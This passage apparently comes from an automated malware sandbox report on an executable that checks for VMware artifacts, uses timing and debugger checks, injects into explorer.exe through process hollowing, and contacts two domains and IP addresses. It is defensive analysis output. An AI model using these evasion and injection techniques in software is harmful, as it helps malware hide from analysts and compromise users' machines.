            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002D59B4E second address: 0000000002D59B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe TID: 3880Thread sleep time: -41295s >= -30000s
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe TID: 1288Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3980Thread sleep time: -46000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 6176Thread sleep time: -50000s >= -30000s
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00409A80 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread delayed: delay time: 41295
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000006.00000000.705078872.000000000FDAF000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000006.00000000.689058385.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000006.00000000.699256456.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.689058385.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.764509665.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000006.00000000.689219732.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000006.00000000.689219732.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: explorer.exe, 00000006.00000000.722338176.000000000FDD4000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Mail
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00409A80 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04933884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04933884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_049714FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04984015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04984015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04972073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04981074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04968DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_049441E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0493A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04933540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_049346A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04980EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04980EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04980EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04944257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0497138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04985BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0497131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0040ACC0 LdrLoadDll,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.dorotajedrusik.com
            Source: C:\Windows\explorer.exeDomain query: www.noseainsight.com
            Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Sample uses process hollowing techniqueShow sources
